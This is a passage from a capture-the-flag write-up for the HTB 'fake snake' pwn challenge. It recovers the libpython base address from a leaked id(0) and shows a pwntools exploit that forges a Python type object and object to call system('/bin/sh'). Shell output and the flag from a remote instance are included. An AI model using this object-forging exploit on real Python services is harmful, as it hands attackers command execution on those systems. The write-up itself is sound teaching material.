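A cheap sanity check for a computed base address is page alignment. A minimal sketch, assuming 4 KiB pages (the usual value on x86-64 Linux) and using the two base addresses from the logs above; looks_like_base is a made-up helper name:

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def looks_like_base(addr: int) -> bool:
    """A load base is page-aligned, so its low 12 bits must be zero."""
    return addr % PAGE_SIZE == 0

print(looks_like_base(0x55f82dac7000))  # True: local run
print(looks_like_base(0x7f33f776baa0))  # False: run against the container
```

Passing this check does not prove the base is right, but failing it is a clear sign that the offset was taken from a different build.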
Fixing the exploit
Let’s take the actual python3.11 binary from the Docker container:
$ sudo docker stop pwn_fake_snake
pwn_fake_snake
$ sudo docker run --rm -v "${PWD}:/opt" -it pwn_fake_snake bash
I have no name!@836ac3d72fd1:/$ which python3.11
/usr/local/bin/python3.11
I have no name!@836ac3d72fd1:/$ cp /usr/local/bin/python3.11 /opt
I have no name!@836ac3d72fd1:/$ exit
exit
However, it needs a library called libpython3.11.so.1.0:
$ ./python3.11
./python3.11: error while loading shared libraries: libpython3.11.so.1.0: cannot open shared object file: No such file or directory
$ ldd ./python3.11
linux-vdso.so.1 (0x00007fffea1d4000)
libpython3.11.so.1.0 => not found
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007efe6a6e4000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007efe6a6de000)
libutil.so.1 => /lib/x86_64-linux-gnu/libutil.so.1 (0x00007efe6a6d9000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007efe6a58a000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007efe6a396000)
/lib64/ld-linux-x86-64.so.2 (0x00007efe6a729000)
So, let’s take it and patch the binary:
$ sudo docker run --rm -v "${PWD}:/opt" -it pwn_fake_snake bash
I have no name!@3d417a55032b:/$ ldd /usr/local/bin/python3.11
linux-vdso.so.1 (0x00007ffc41fd8000)
libpython3.11.so.1.0 => /usr/local/bin/../lib/libpython3.11.so.1.0 (0x00007fb1133f0000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fb1133cd000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fb1133c8000)
libutil.so.1 => /lib/x86_64-linux-gnu/libutil.so.1 (0x00007fb1133c3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fb113240000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb113080000)
/lib64/ld-linux-x86-64.so.2 (0x00007fb113987000)
I have no name!@3d417a55032b:/$ cp /usr/local/bin/../lib/libpython3.11.so.1.0 /opt
I have no name!@3d417a55032b:/$ exit
exit
$ patchelf --set-rpath . python3.11
$ ./python3.11 -q
>>> exit()
Now we have it running again. Let’s add this on top of the exploit:
context.binary = python = ELF('./python3.11')
def get_process():
    if len(sys.argv) == 1:
        return process(['./python3.11', 'challenge/server.py'], level='DEBUG')
    host, port = sys.argv[1].split(':')
    return remote(host, port)
If we execute the exploit as is, we will get an error saying that python.plt.system does not exist. So, we can comment out this part and try again with GDB attached to the process:
$ python3 solve.py
[*] './python3.11'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'.'
[+] Starting local process './python3.11' argv=[b'./python3.11', b'challenge/server.py'] : pid 876053
[*] running in new terminal: ['/usr/bin/gdb', '-q', './python3.11', '876053', '-x', '/tmp/pwnfa1izjyv.gdb']
[+] Waiting for debugger: Done
[DEBUG] Received 0x55 bytes:
b'Zero: 140083410526856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] id(0) = 0x7f67b5ec6288
[+] Python base address: 0x7f67b5948aa0
[*] Switching to interactive mode
0) Add To Store
1) Remove From Store
2) Load Address
Selection:$
The first thing we notice is that the base address is not correct. Furthermore, the address of 0 is no longer inside the binary but in a library:
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x000055fadf1c6000 0x000055fadf1c7000 0x0000000000000000 r-- ./python3.11
0x000055fadf1c7000 0x000055fadf1c8000 0x0000000000001000 r-x ./python3.11
0x000055fadf1c8000 0x000055fadf1c9000 0x0000000000002000 r-- ./python3.11
0x000055fadf1c9000 0x000055fadf1ca000 0x0000000000002000 r-- ./python3.11
0x000055fadf1ca000 0x000055fadf1cb000 0x0000000000003000 rw- ./python3.11
0x000055fadfa49000 0x000055fadfada000 0x0000000000000000 rw- [heap]
0x00007f67b4ba5000 0x00007f67b4bac000 0x0000000000000000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bac000 0x00007f67b4bbd000 0x0000000000007000 r-x /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bbd000 0x00007f67b4bc3000 0x0000000000018000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bc3000 0x00007f67b4bc4000 0x000000000001d000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bc4000 0x00007f67b4bc8000 0x000000000001e000 rw- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bc8000 0x00007f67b4e2a000 0x0000000000000000 rw-
0x00007f67b4e2a000 0x00007f67b5613000 0x0000000000000000 r-- /usr/lib/locale/locale-archive
0x00007f67b5613000 0x00007f67b5618000 0x0000000000000000 rw-
0x00007f67b5618000 0x00007f67b563a000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x00007f67b563a000 0x00007f67b57b2000 0x0000000000022000 r-x /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x00007f67b57b2000 0x00007f67b5800000 0x000000000019a000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so
...
0x00007f67b5996000 0x00007f67b5997000 0x000000000000a000 rw- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007f67b5997000 0x00007f67b599b000 0x0000000000000000 rw-
0x00007f67b599b000 0x00007f67b59a2000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
0x00007f67b59a2000 0x00007f67b5a90000 0x0000000000000000 r-- ./libpython3.11.so.1.0
0x00007f67b5a90000 0x00007f67b5cb3000 0x00000000000ee000 r-x ./libpython3.11.so.1.0
0x00007f67b5cb3000 0x00007f67b5d90000 0x0000000000311000 r-- ./libpython3.11.so.1.0
0x00007f67b5d90000 0x00007f67b5dbe000 0x00000000003ed000 r-- ./libpython3.11.so.1.0
0x00007f67b5dbe000 0x00007f67b5eef000 0x000000000041b000 rw- ./libpython3.11.so.1.0
0x00007f67b5eef000 0x00007f67b5f34000 0x0000000000000000 rw-
0x00007f67b5f34000 0x00007f67b5f35000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f35000 0x00007f67b5f58000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f58000 0x00007f67b5f60000 0x0000000000024000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f61000 0x00007f67b5f62000 0x000000000002c000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f62000 0x00007f67b5f63000 0x000000000002d000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f63000 0x00007f67b5f64000 0x0000000000000000 rw-
0x00007ffcf47ce000 0x00007ffcf47ef000 0x0000000000000000 rw- [stack]
0x00007ffcf47f3000 0x00007ffcf47f7000 0x0000000000000000 r-- [vvar]
0x00007ffcf47f7000 0x00007ffcf47f9000 0x0000000000000000 r-x [vdso]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
Actually, the address of 0 belongs to libpython3.11.so.1.0. We can probably build the exploit against this library as if it were the binary. This is the offset needed:
gef➤ p/d 0x7f67b5ec6288 - 0x00007f67b59a2000
$1 = 5390984
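The same subtraction, and the way it is later inverted to recover the base from a leaked id(0), can be written down as a short sketch. ZERO_OFFSET and libpython_base are names invented for this example, and the offset only holds for this exact libpython3.11.so.1.0 build:

```python
# id(0) minus the start of the first libpython mapping, both taken from the GDB session
ZERO_OFFSET = 0x7f67b5ec6288 - 0x7f67b59a2000

def libpython_base(zero_addr: int) -> int:
    """Base of libpython3.11.so.1.0 derived from the leaked id(0)."""
    return zero_addr - ZERO_OFFSET

print(ZERO_OFFSET)                          # 5390984
print(hex(libpython_base(0x7f67b5ec6288)))  # 0x7f67b59a2000
```

Because the Dockerfile pins the image by digest, the remote instance should use the same build, so the same offset applies there.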
Let’s update the exploit:
context.binary = python = ELF('libpython3.11.so.1.0')
# ...
def main():
    p = get_process()
    p.recvuntil(b'Zero: ')
    zero_addr = int(p.recvline())
    p.info(f'id(0) = {hex(zero_addr)}')
    # id(0) lives in libpython at the offset computed above
    python.address = zero_addr - 5390984
    p.success(f'Python base address: {hex(python.address)}')
    # Fake type object: padding up to offset 0x50, then system in every slot
    type_obj = sp64(0xacdc1337) + b'X' * 0x48 + sp64(python.plt.system) * 100
    fake_type_obj_addr = add(p, type_obj)
    # Fake object: refcnt reads as "/bin/sh\0" after two increments
    fake_obj_addr = add(p, sp64(u64(b'/bin/sh\0') - 2) + sp64(fake_type_obj_addr + 0x48))
    load(p, fake_obj_addr + 0x48, do_recv=False)
    p.interactive()
And we have a shell again:
$ python3 solve.py
[*] './libpython3.11.so.1.0'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './python3.11': pid 882238
[*] id(0) = 0x7fd0f67cb288
[+] Python base address: 0x7fd0f62a7000
[*] Switching to interactive mode
$ ls
build_docker.sh Dockerfile python3.11 test.py
challenge libpython3.11.so.1.0 solve.py
And also in the Docker container:
$ sudo docker run --rm --name pwn_fake_snake -p 1337:1337 -d pwn_fake_snake
c1af67fd6faac1b3b6cca10a6eb046c5d263b571564b1370123bae335bc5f7e9
$ python3 solve.py 127.0.0.1:1337
[*] './libpython3.11.so.1.0'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] id(0) = 0x7f7614caf288
[+] Python base address: 0x7f761478b000
[*] Switching to interactive mode
$ cat flag.txt
HTB{fake_flag_for_testing}
Flag
Let’s get the flag on the remote instance:
$ python3 solve.py 157.245.41.35:30659
[*] './libpython3.11.so.1.0'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 157.245.41.35 on port 30659: Done
[*] id(0) = 0x7f25a2590288
[+] Python base address: 0x7f25a206c000
[*] Switching to interactive mode
$ cat flag.txt
HTB{f4k3_0bj3ct5_4r3_p0w3rfu11}
The full exploit script can be found here: solve.py.